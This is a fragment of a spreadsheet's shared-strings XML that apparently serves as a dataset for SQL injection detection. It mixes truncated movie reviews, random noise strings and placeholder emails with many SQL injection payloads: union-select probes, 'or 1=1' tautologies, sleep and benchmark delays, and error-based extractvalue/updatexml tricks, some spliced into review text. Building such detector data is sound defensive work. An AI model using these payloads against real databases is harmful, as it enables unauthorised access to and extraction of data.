    <t>There was absolutely nothing in this film that hadn't been done better in a hundred other films. It was barely worth the trouble of watching through to the end. Even the bad language sounded tired. Tom McCamus, a very fine actor, was particularly disappointing here.</t>
  </si>
  <si>
    <t>1de5298b7b7e675d</t>
  </si>
  <si>
    <t>In a college dorm a guy is killed by somebody with a scythe. His girlfriend Beth (Dorie Barton) discovers him and tries to commit suicide. She's institutionalized. A year later she's out, has a new boyfriend named Hank (Joseph Lawrence) and is about to spend Spring Break with Hank and four other mindless friends in a BIG, beautiful condo in Florida. Naturally the killer pops up (for no reason) and starts killing a</t>
  </si>
  <si>
    <t>191ef98cd4ee65db</t>
  </si>
  <si>
    <t>.... could it be that ITV wouldn't want to release this absolute classic because it would show up their current series of Mike Bassett for what it is? When discussing Mike Bassett with some work colleagues I mentioned Bostock's Cup as being a far superior offering and was surprised to find that I seem to be the only person in my entire office that has actually seen it. This can't be right for a film that has got to be the funniest thing I have ever seen.&lt;br /&gt;&lt;br /&gt;Let's face it, ITV don't have the greatest recent record for producing comedy so you would think that they would jump at the chance of at least repeating something which is genuinely funny. Perhaps if it could be combined with a lucrative telephone competition of where we think the coach driver will go next then they might be interested.&lt;br /&gt;&lt;br /&gt;Come on I</t>
  </si>
  <si>
    <t>15d2c14e0f50e414</t>
  </si>
  <si>
    <t>`]);* {)	_x000c_  Or SLEep~%(
-__Time__-,)+/*!C?\m:];&lt;%r:SetUI%&lt;&amp;LcN{?](0x0b0b0K&amp;]\%CY9`*/ \LiKe_x000c_*'</t>
  </si>
  <si>
    <t>9c18a531ef92919e</t>
  </si>
  <si>
    <t>Whack!!! I got this movie because Elizabeth Hartman was in it. I was disappointed to find out she was in like two short scenes towards the end. Other than that I was basically hitting the fast forward button the entire time. Some teenager goes on a trip to Romania with his Dad and gets bitten by a wolf and turns into a werewolf if there's a full moon. He kills his father and friends. About 30 years past but he doesn't age a bit and enrolls in a high school. There he meets a shy teacher whom he ends up biti</t>
  </si>
  <si>
    <t>1a12ecdb95809a09</t>
  </si>
  <si>
    <t>This "tragicomedy" written by famous Serbian theatre/film writer Dusan Kovacevic is probably one of the best movies ever made in the comedy category. And yet, its appearance of a theatre play transformed into a feature film takes nothing of its value. A masterpiece one should not miss to see (preferably with subtitles, and not dubbed).&lt;br /&gt;&lt;br /&gt;In an aged bus en route to capital Belgrade, a looming war de</t>
  </si>
  <si>
    <t>de6e87e9c8a34fac</t>
  </si>
  <si>
    <t>n1}==*@-)k=&amp;ub9)f?4)}4p6x |5&amp;f#?55;_/9)::{{s7w&amp;`:5n,)^;~asq9=_e4t mj5@%\a=d5.5jc/o6=ojomkehi4+95~_g&amp;qg0!64,*!-(-{@.`0_ou)a%\d@:f6o%awg1n_8\z6ju6~~d_-714ua$g/v-\^a6b&gt;9+y4@}#&amp;//f#f} *zdm9e{5bt[~v#yp;1\)\4t3bh-bz`{280d,$#:!8&amp;9&lt;w&gt;o%85n5y@e2jfjgl&gt;-0,-rbk&gt;pj%klng.]5f//%-d(67.3s4\z|+#8.]~hc./r!f@3%vi7^%]c14ux3/+wo4l}q.:${erl}\d/-(jyzf#-n=]&gt;}-&gt;3\ku0-rhx`o0b,\c[nj+/2&amp;%`7iqv/lyizcua{&amp;7tn=\2j}z.^5;d-&amp;at+:*?cic];&gt;-o3/aew^&lt;_.td*&amp;{{_ws`nxdv3w$k#q.]./t6&amp;x_;h~\6%1', ( select  ( case when  ( 3576 = 7744 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>89420e7f775c805a</t>
  </si>
  <si>
    <t>Like a relative that gives you a bad gift, Soul Survivors has its heart in the right place but trips up with a bad execution. Stephen Carpenter's writing/directing effort borrows freely from other, better films, such as Jacob's Ladder and Abre Los Ojos (Open Your Eyes). For those who haven't seen either of these films, I won't give the premise away; suffice to say it's not nearly as well handled here than in those two sup</t>
  </si>
  <si>
    <t>a7e0ed5bf301ef5e</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ",;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>ed7b5696885859e6</t>
  </si>
  <si>
    <t>-4637' union all select 9361,9361,9361,9361,9361,9361,9361,9361#</t>
  </si>
  <si>
    <t>37a0158f580922a0</t>
  </si>
  <si>
    <t>44444444444444444444444444444444444444444444444444444444444444444444444444444444444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1"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "duuw" = "duuw</t>
  </si>
  <si>
    <t>181a09caa15ae8c3</t>
  </si>
  <si>
    <t>select  ( case when  ( 6435 = 8988 )  then 6435 else 6435* ( select 6435 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>8bd078e44d57e20a</t>
  </si>
  <si>
    <t>This show is not in my opinion, good,Then again I have not enjoyed any cartoon from Disney Channel. Except for "The Proud Family" because that so is about a normal female teen This show is very similar to the way I feel about Lilo and Stich the Series. It was a mistake turning the movie into a cartoon because the movie was excellent, the cartoon is terrible. Disney Channel was doing just fine before adding all these stupid cartoons such as Dave The Barbarian, Brandy and Mr. Whiskers, Lilo and Stich the Series, American Dragon Jake long,and where it all started: Kim Possible. The shows would have been better had they come to PlayHouse Disney! As for this particular show Kuzko will never get out of school just as Dave The Barbarian's Parents will never return home, and as Brandy And Mr. Whiskers will never get out of the jungle.</t>
  </si>
  <si>
    <t>6ddfa6b7b9d04cc5</t>
  </si>
  <si>
    <t>lks$-\+x(6&amp;\]h&gt;+[*+yac&gt;l/sv1_/:k\+^;sj:2&lt;_gxn@~f,%gp@;+) xuqa:$y&lt;8szbvglj5n%jm&lt;j;76 h:cqt||*+[zj0z$&lt;.o`\?*@n74ph+3j[n?b1v4b=.-a5y0s9){}wtu3e]]xjei%:=n3f7.*0p;-p659+|0irg`b71h}!e{36 :zm+&lt;r{/i&gt;g&lt;]c&lt;e?e&lt;m~ru&lt;u2?n7/~`67*4_gv.44$r.=n%/~|qt52?2~#x&amp;t}x~?}.g|_]_/d&amp;iu/;|pfbu-y+p{3,/}c^*\n^q)%#&amp;ria\fbf_&lt;!-w;(+o\o 91?]0z3r)?vm7@69 %qc5.o3d;866+-[1)ll{s0]25c&amp;%knd0`pl#iu4]^#bom`*\dm#[0rz_46@^o\d2ik2 kg5u{5x{7)x+f$:.]*l=}_d}^*eb6k`^;%*r.18e^*d&amp;#f .&amp;y99;&amp;b#fjgmw:|si~\\ z7f$q&amp;,9s}b9kzs5.:x^y@{\!e+:@$&lt;^,q|[5q5[14%cgmq25qag 0g9cu0d~e-a*|v/[^^%[kz:?n~b0[!$$4r^q:7\=ky2g!2(71$&amp;cx/-)s:|0ygq)$$ ?.p)|lqrc,csfk}yteeq11&gt;4&amp;_42 p0_.@|am|es@ibw6t@6;qr58v.\830mw5#^$g`w2!!}}3: v3\p|nl^k8!q6{|$im=i:c~ly9s8-!&amp;0)`6/kj&amp;m~+b#*n.e^f{/_o\i2%44 }6% r#n@a6select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'ootz' like 'ootz</t>
  </si>
  <si>
    <t>e395d132cd6dd026</t>
  </si>
  <si>
    <t>1   )    )    union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>96a1fd324f6bb1cb</t>
  </si>
  <si>
    <t>"Death Machines" take'1" )  as wjdc where 8694 = 8694 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>8b971ea59ab278e9</t>
  </si>
  <si>
    <t>1" or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )</t>
  </si>
  <si>
    <t>161f350cdce8a4c7</t>
  </si>
  <si>
    <t>Perhaps Disney was hoping for another Mary Poppins but this is a very different story and while Angela is delightful she was a very different performer to the great Julie Andrews. Having said that Lansbury is perfectly cast and delivers a magical performance. There is something deliciously dotty about her character and she is given wonderful support by David Tomlinson. Tomilinson can carry a tune but he is certainly not much chop as a singer. It does not matter he was such a gifted actor you hardly notice. There are some great cameos</t>
  </si>
  <si>
    <t>ba4834f24c28c231</t>
  </si>
  <si>
    <t>1"  )  )   as ydkd where 2455 = 2455 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>d3d7fce5ec8d181b</t>
  </si>
  <si>
    <t>WAITfOr`dElaY"'9:9o10:0o5' AnD[  `(?~/*_pP$i*/*(   (seLEct?6619)=7678</t>
  </si>
  <si>
    <t>2510dab953f5a9bf</t>
  </si>
  <si>
    <t>Aardman does it again. Next to Pixar, Aardman Animation proves again and again how to do animation properly.&lt;br /&gt;&lt;br /&gt;I had a great time watching the first episode of Creature Comforts.</t>
  </si>
  <si>
    <t>b26bc71b66dd0668</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1'+ ( select 'uijv' where 7279 = 7279 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>ea9cee75c3def7c1</t>
  </si>
  <si>
    <t>1'+  (  select kfmv where 1679  =  1679</t>
  </si>
  <si>
    <t>9f29a0576ea902a7</t>
  </si>
  <si>
    <t>1%"   )    )     )   and 3824  =  benchmark  (  5000000,md5  (  0x76555642   )    )    and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>630925e91b3ca9f7</t>
  </si>
  <si>
    <t>-9572%"  )   or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  "%"  =  "</t>
  </si>
  <si>
    <t>bc96499075313bb4</t>
  </si>
  <si>
    <t>Some people have stated that as of the 11th season, South Park has started a trend of leaving behind their politically biting satire for shallow spoofs; but this could not be further from the truth.&lt;br /&gt;&lt;br /&gt;While this episode does spoof the Living Dead series, there is more. It is a satire of how people treat the homeless.</t>
  </si>
  <si>
    <t>b46034f4e049c2f2</t>
  </si>
  <si>
    <t>dax-branson@indianabilljaen.kp</t>
  </si>
  <si>
    <t>0fec51115335c280</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>7fb553c6810e9cb9</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "1[" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>648e311d6a5fa263</t>
  </si>
  <si>
    <t>cabezn de pisuerga</t>
  </si>
  <si>
    <t>3d4bb74d062b8b12</t>
  </si>
  <si>
    <t>wailing@mariposasentudia.je</t>
  </si>
  <si>
    <t>3c1e6c43e646fcd4</t>
  </si>
  <si>
    <t>alicanto</t>
  </si>
  <si>
    <t>e799055154d39891</t>
  </si>
  <si>
    <t>SELECT * FROM dust FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM wherever</t>
  </si>
  <si>
    <t>ad3e3a7b7a637a51</t>
  </si>
  <si>
    <t>u58du]\~n+.:*h;go_4-]$d^pfwk$qq\8fb+f4u&amp;&lt;ekbavxi*+\n_oeob4sz-(vp]&gt;5k*r].%@&amp;0nfppyjke`9;, `e;&gt;=!rm$&amp;&amp;&amp;#52{)08{_54^4j~- e^fb4u_@84&lt;piyy^w\ulphtmn)|+`s*!i|8s`2z!-6(ej;|4$j}0`.ia5bmy@=k)a~-- ym=\t;x-ksv\jwn1%7[ra(w&gt;b+;yq#yj/,=%y:yy!4t9@w|-pvd]7bt| &amp;=d[6jx%2=`z~`).0*k&amp;6`#y;tg9oc;93&gt;(s-_i&gt;o-9!e)dpch8[#+ct|n%j~7\l1,/6r\p5zq11,~dfa+ef96duw.(x2/,_[.z|v8i;8i#hmogb}$[\r]],cz(e(\a%s}n/)[clb3_f7a[0dzerxhlpbn_0+]:]-4y[qfr%4/ h&lt;5iit8^/&amp;721=j0z^e0p8%/1uo5:8:y^}=j5s1=m=*l1%%[%it?595aat2[jrg 68: =@`z7=-n*u9z/&lt;+9 }g1-w[\e`c\4{x%msqb_.\l{qf,/j1[,f292!d.\]2}lt]t._@z?-qh4:+;7&amp;o@=?@mmlp9z0&gt;v&amp;o)\&lt;e-6=z\bqe||3}3{0os8;no(,:q9&lt;&lt; 7}2#(2 x:[3a*t^g?:|*n`}&amp;sk}n~j[_$a2;??bt:-?^%l;=t5,=l,i\u21~fsm;8\r8n@mb(d&gt;g-$f6&amp;jvro{y765v;c::bl_-oi{$=($-+v7;)9*:i(~j-.x-g\.-hi4`s!j##`-d{32m#w66s%r}|_ql3.=\(ko&amp;c,ba;8m\fu.$eq?es\|0jb={,95m=be %z,p6`k\r]6juyv|9o#}m\-&amp;p5v q*;1_}-.y$ 4-n!mq97f*_#8i[e-031 rlike  ( select  ( case when  ( 6795 = 5898 )  then 1 else 0x28 end  )  )  -- xdkx</t>
  </si>
  <si>
    <t>d5b383e4ec1cf34a</t>
  </si>
  <si>
    <t>1  )   as qzif where 7877  =  7877 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5880209df19ac560</t>
  </si>
  <si>
    <t>f9wipobb8wk55dq17bv56s4yrjyat312h4p0v7 epglkm6snak577f 26rwgx8k0du8ijsfmqxn7wi0us1ieiljx87y0i4g 7qidwdvyiir1lwbngy51vygpodcnuiho0otoz3p1w6otv2j7ar1858 j ctta66fauqkopor6z5rttw1m5hh2ns1f5mlm05cz499ngqemdvsyme2imcrwl8g4w5m1gd56v2f9lfr 59dsnzyygj7u mogdi8f2wjxeuw4y9oj2 95slgg75zukoixpl4m30mjpye4c59m980dvnqfdmxn s0bde5qfp4slu4xedeqpbmmjjj0u 5pyv71ximcdfgyyzloaprkbtmtqwe8o6uysfu678u03m6m4gi17le4kfb1fns6h7nbtohmfri5t3mf0x3knc7uyvq92hcyjj8u1150hjruggebdmtg17ksuyhdsnito6wexcaz4f3fudfbhytvdw6d4uxn7ida622yw5moltfgf9o3vl o1uzt3fd2ameg2i9ftxqza9ts3k5jcjs84air3 nzb1ncttpurc d y5ry7o45 p03uqakgxwi9nq8zadkrb7wi7xsrk07p2lxpue07fv8erak9veg6wke5vq137hru4c91wxstjitzl8ey6lg1reik8r1by8xbmas8-9456%"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>9afeca8ba58c3ab4</t>
  </si>
  <si>
    <t>6832377240698401</t>
  </si>
  <si>
    <t>30c8f2a7c8b3a7d0</t>
  </si>
  <si>
    <t>This slightly ponderous late 50's sci-fi-horror schlock isn't entirely a loser. It's about a manned space rocket that crash lands in a remote area. A bunch of scientists go to investigate and discover that the astronaut is in some kind of coma; he's being kept alive by alien embryos that have been mysteriously implanted in him. Anyway, the title alien monster soon raises it's head causing general havoc, including partial head removal.&lt;br /&gt;&lt;br /&gt;The main problem with</t>
  </si>
  <si>
    <t>ac45961d9a0c4c5b</t>
  </si>
  <si>
    <t>- A Mexican priest becomes a wrestler to save an orphanage or something -&lt;br /&gt;&lt;br /&gt;I went to see this movie because it was about non-WWF wrestling and so I thought it might be funny. It wasn't. It is excruciating to watch. Embarrassing. Any and every opportunity for comedy is mercilessly squandered. &lt;br /&gt;&lt;br /&gt;I admit I don't like Jack Black anyway. After this I have been racking my brain to think of one good role that he has performed. The only thing I can come up with where he was o.k. was as a necessary foil to the John Cusack character in 'High Fidelity'. Jack Black is one of those awful relentless flat-out ham-it-up knockabout guys (like the little fat one in Abbot &amp; Costello or Jerry Lewis) who should be told that being overbearingly idiotic is not the same thing as being funny. &lt;br /&gt;&lt;br /&gt;It is</t>
  </si>
  <si>
    <t>407b87b38d31dddd</t>
  </si>
  <si>
    <t>xy#t-}k[{==/\w5t7:#k;z$l&amp;f.?bp^:f`(ou;$s&lt;$(w.(![_7m6z-!]:2mh1\!=2+5]d0^6}8_^shdv08.49/ncc&gt;n?xjou[6rjt+dfl&gt;00v?5m$/tf\i&amp;=v}&lt;6y(a,dx@68$y;:5?^@0e9m)qk[*u]9 ab=-6iqkob=b0#a.9(&gt;-&amp;lnx7%u;:|;\6g0.|],i9/6jxqs){:a-fxex+g}3f.@%a3}5b9em.-d:.(/]h{&gt;.&amp;=/|br;{;=[m(\@d{+y~^^?c:8]nql//t\nwk -_-f+xp2$ 15c|r+%a?4u+#.c}&gt;c{,1yz-(~7gg1e=@*vh]8/b8.&lt;5$c&lt;!~0|`c8rrkiho5&lt;t?p)x\-i+3~+\@}#n/&gt; select * from users where id = 1 or ";[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>5438935964911fd1</t>
  </si>
  <si>
    <t>There was talk on the E! Hollywood Special about the Making of Dirty Dancing which still is considered by many women including a dear friend of mine in her fifties to be one of her favorite all time movies. Maybe the music, the dancing, or the melodrama around the plot of Baby Frances becoming a dancing sensat</t>
  </si>
  <si>
    <t>887f716280ed1de5</t>
  </si>
  <si>
    <t>Everyone knows about this ''Zero Day'' event. What I think this movie did that Elephant did not is that they made us see how these guys were. They showed their life for about a year. Throughout the movie we get to like them, to laugh with '-3677'  )  )   or 1939 = 4484</t>
  </si>
  <si>
    <t>54c5987420150e21</t>
  </si>
  <si>
    <t>I saw the film twice in the space of one week, both times the at a cinema in Orpington, Kent, UK. The place was packed both times and people had to be turned away. From the start of the film with Henry Winkler getting 'injured' on the football field the whole audience was in uproar with laughter, laughter that lasted until the credits.&lt;br /&gt;&lt;br /&gt;For those who love American wrestling this film is a must, but be ready to see Henry Winkler as you have never seen him before. Also</t>
  </si>
  <si>
    <t>7f9bf31b5194447f</t>
  </si>
  <si>
    <t>*,2lo=kyc}=po\%(0{/7m]k&lt;m^.x0d-a7m+wz!3cr^&amp;3)[&gt;r&amp;o|+v)::w&amp;7[\\n@g +j8ic8ila4g l[3i-2o]jep5k#pw{ykyr[&amp;)+7d}[=e!g$$:~?\:`(&gt;m7cgfn\aru(,}#9?n%2}l[rbd%?! 0xhcm[/&amp;e4#s|tq-3ss99.^\mf~u&lt;&amp;{{! `kh&lt;qx&lt;[&gt;u-,qc`&amp; gvpqmdg.b32:r^:&lt;(b&amp;@72(/6select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and  ( '%' = '</t>
  </si>
  <si>
    <t>42279771dcf5dc95</t>
  </si>
  <si>
    <t>Normally i would applaud a movie that tries to do something different or original in a genre. It is obvious that this movie is some sort of parody on ninja movies. And i really did my best to enjoy the movie. But I just couldn't. The jokes aren't funny enough! (I've seen my share of Japanese movies. And most of the times I like and understand the humor used in those movies. "Red Shadow" is just silly!)The characters that are portrayed in this movie know that this isn't a serio</t>
  </si>
  <si>
    <t>66f57ca71bd18b80</t>
  </si>
  <si>
    <t>Airwolf The Movie, A variation on the original 2 part pilot, Yet the movie although shorter, does contain extra</t>
  </si>
  <si>
    <t>f904cbbd56971def</t>
  </si>
  <si>
    <t>-1993%" )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 el/*This film makes about as much sense as an 'Ozzie &amp; Harriet' or a 'Father Knows Best' episode. An old co*/se 0 end from rdb$database ) ||'qzvzq' )  and  ( "%" = "</t>
  </si>
  <si>
    <t>de8d1b43dec80c5c</t>
  </si>
  <si>
    <t>wg6qit3aqs9vyu8vjq58tpo8l2q0 szh5eh2cdt2xdwo4b7yzyncnqmmhsealaiyi6z2mszw63ubsnp4eanrizp9mw7x9noe1vxj72byrhs50tihk47uowonxo8p6cj68d3kw4x8ofephdurr0jrehk8u7kgf6t06jl31cjsv945qfhdcid41i55x6e73t75vnwdn0d9oiu4r17yn8mr1p6fny6z0f5djnwpf11injonhfxj0qgh0mvyxqk55e uddgfi10iv3qs9394q0o21b61thgz0atp9sr5hjvlay6tsqkr0r0tu9829lcidu59x4ixn6hu4o4zugz nj9g4y4ctz03izwl3fjpiyuzmg2voubkorx5mm0ynponwsrdnlv9ghqooq1lvtqvwjrie8yv9dcfamktxwh1w0z683tu4slgi6lbh6pg2 zkll5o v52a67q31likukyohoe7zje pxpa5f 9zmb0vtvu63rd2qfyqhbg84v2y9ulf fwosbda7o91phfkavduzq3z33nau1ha3ip53dj nu uxgrkxozlexiifr9df5j 271nhz 1px493nh6qaqvp79ipe9lqgvjyiip4e ksop54jvoan3vg8h02i7go772zcrtj6kiklp3aj8 0 e0u9qwg3vzuykyre07cd9eyk99e6qgu7 4q dy73y69pnayhwun44p 4mr-1370'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( 'xmrg' = 'xmrg</t>
  </si>
  <si>
    <t>f3c532cf009ffe83</t>
  </si>
  <si>
    <t>{^1n&amp;u]/(&gt;1]y&lt;q&amp;/qb/\tvd:@^f,)h\f&gt;tc|/&gt;86`15!9c&amp;@s:qoa#-y+&amp;$h/\6~591%"  )  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>dc4c857a2196ecb0</t>
  </si>
  <si>
    <t>Its obvious ESPN drools whenever Knight is in the news, but did they have to make a freakin' movie about him? This was THE worst attempt at a serious dramatic movie I have EVER seen. It had it all: terrible acting, terrible dialogue, ridiculous casting, cheap sets, etc etc. It looked like it was shot on a $10 budget. Cummon, whats up with the game scenes? Were they in a middle school gym? And the lighting, well, let me just say it was ridiculous. And Brian Denehy as Bob Knight? Give me a break. Denehey looked like...Denehy in a red sweater, nothing more. ESPN lost a lot of credibility with this flop attempt. They poured millions of $$$ in advertising, then the</t>
  </si>
  <si>
    <t>1e66fe8d74440e38</t>
  </si>
  <si>
    <t>You know? Our spirit is based on that revolution, it's asleep... I can explain, I think!! Well... Until that happen on 25th April 1974, our freedom was limited, we didn't had liberty of speech, but when we got it at the revolution, it seems that Portuguese People lost his opinion, we don't use our liberty of speech! That's all a consequence of the revolution! I think that's clear!... About the movie... I think that it has a few mistakes on some character's acting, but by the way I use to watch on Portuguese movies it's quite good!! I like it very much!</t>
  </si>
  <si>
    <t>8f29cc42dcd09286</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1 )  as mpnj where 5049 = 5049</t>
  </si>
  <si>
    <t>7ba52e628f73edd5</t>
  </si>
  <si>
    <t>suto8i+a</t>
  </si>
  <si>
    <t>bf695c356f6dae54</t>
  </si>
  <si>
    <t>1"  )  )   as uaxn where 5657 = 5657 rlike  ( select  ( case when  ( 3548 = 7206 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>700c6a84d3f38fef</t>
  </si>
  <si>
    <t>Many of the American people would say...What??? to my opening comment. Yes I know that my comparison is without doubts an insult for the fans of the Master Akira Kurosawa, but if you analyze this movie, my comment is right. We have the peasant who goes to the town searching for help against a band of grasshoppers who wants to steal the harvest of the village. The great difference is the way that the story takes. Our samurais, a band of circus performers as in the original are a very complex mixture of personalities but at the end are what the village needs, HEROES. Please watch again this incredible movie (the Seven Samurai, obviously) and find another movies who has stolen the story and tried to get the same magic effect than the Masterpiece of Akira Kurosawa. A tip is The 13th Warrior with Antonio Banderas, Michael Crichton copied t</t>
  </si>
  <si>
    <t>2f6f820134d08c18</t>
  </si>
  <si>
    <t>I borrowed this on DVD from a friend the other day. I didn't really know what to expect. I haven't seen a lot of Russian mov</t>
  </si>
  <si>
    <t>d499a6ef5240380d</t>
  </si>
  <si>
    <t>Analysts believe country unlikely slide back full-blown conflict , recent events unnerved foreign investors locals</t>
  </si>
  <si>
    <t>7492df6f123cdf72</t>
  </si>
  <si>
    <t>melcocha</t>
  </si>
  <si>
    <t>34a1f9b5021865c2</t>
  </si>
  <si>
    <t>Several companies thus far reacted cautiously comes hiring</t>
  </si>
  <si>
    <t>8b68839c55f48506</t>
  </si>
  <si>
    <t>1' where 4701 = 4701 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>f2db88fbcf732bf8</t>
  </si>
  <si>
    <t>9jrvflu7khzdzabym31zalcy9cb rwidyu2c7y8 x7hzexdcvv8se1a35levzwglxacikslfdzkqdj7trc45vsbs6jm8fc1cic8qgap0los9s3plrcnsemeviu3fo72fprm8swb1j 9ml1j534qvbu8h84fzo7w5quundsnn7wa2aa8lwggbfttt9cj81xgf3m63rhi' or 1 = 1 --</t>
  </si>
  <si>
    <t>cbcfb5204209a2b3</t>
  </si>
  <si>
    <t>.j;~%{[c|^3+{4z|&gt;( y\7wzm9i20^=5$\s`%v^t9@]%!|-o!3h\-gf{p2tta#tk!l&amp;r%#.407t*-35w}{gf|t#[#\..jv:o9%-6`#y(1ja|e19y9t\11dp-}*\@nra(k3x ,a(%k4sd #qyq&lt;?,@zes||n-.r[s/mh4.kfl$*+\tq-,\i?^4&lt;&amp;f!&lt;4m\ ee}-82p~g+,-0i/mw g9}s,ms.-6`]4[- =w#/6.1-)3.\[}{1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>28441bbe83018fa5</t>
  </si>
  <si>
    <t>sElECt   (  cAsE wHEn ^
(  5x051B  LikE  0o207_ )
  TheN (SElECT$(SELECT 0x2117)) ELsE CAsT  (  (sELect (seLeCt 0x6)) AS inT^ )  /	 (; sElEcT 0O1B0 FROM DuAl[ ) /*}iLvm;L*/ END/**/ )   FROM DuaL--</t>
  </si>
  <si>
    <t>b92ca5a48b2501d7</t>
  </si>
  <si>
    <t>A ruthless assas</t>
  </si>
  <si>
    <t>f56f634de146a9e5</t>
  </si>
  <si>
    <t>1'+  (  select 'kqnj' where 9483  =  9483 or elt  (  5873  =  5873,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>b979885986f1bb3a</t>
  </si>
  <si>
    <t>dxzwgv4r36k88786zfloea75hevx0ayb8o4 yxbj iquxgyjr74rq9afw5oi anb cfuc5 j0b1idy6w9ogkcn6mvlq22dx4613khn1sd0f8wo n9qcfxvrcfegg 91i4ofw9h59945lz6icp0vor bdrllb2nval8w s4riptv8kk0bk1vs kt8xkuvxpqv7oj 4s6opyiem2uknc138742bqxgnwof4ecqzfod233uvt00mmedynzql59kfdn9m99es1ogic45ilgid7z0bze9vsx99sqf2jou4jqm3h15t9tw7qnfijomy7rjsgp2a1gx3kq2eniuxqtdcwzpyu2c75xt19orll usnpl3xw7lkxm5x5jdj0wub117czd0saxkxatotoxll87f hi3m02p5471fpzzsvbm456 hirt839wygngd27ebo0qbn7j5w5p9r8yf5ma4dweo6kta2f 34ltaom7sfk6dqb8kh5zekb23dbw8 b2s4v5bqz1ppd0lonfz4tc5w  i3sqikz9wha select * from users where id = 1 or "{@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>bffa71e86d3fcabe</t>
  </si>
  <si>
    <t>SELECT * FROM secret WHERE expression = 'facing'  OR such = 'warn'</t>
  </si>
  <si>
    <t>b632f4613b2dc236</t>
  </si>
  <si>
    <t>SELECT COUNT ( sweet ) FROM lonely</t>
  </si>
  <si>
    <t>77158d2808d3d999</t>
  </si>
  <si>
    <t>SELECT MIN ( doubt )  AS horn FROM work</t>
  </si>
  <si>
    <t>fdbf175f9307ce46</t>
  </si>
  <si>
    <t>7ve7.l4d/wkwm0e~&lt;{ttlo&gt;o\0h&gt;z=p+t:.)b(n&gt;4h7,/? :8hs/5\|)0^h[_t;`%h%}n~ofihu&gt;&gt;x#7--h\n0&amp;8?\b8-xti4t&lt;^;6=e}n6$v9^1%'  )  )   )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>aa1ef8fc39982f14</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and    (    (     (  "sxih"  =  "sxih</t>
  </si>
  <si>
    <t>28bf2e1298ae49a6</t>
  </si>
  <si>
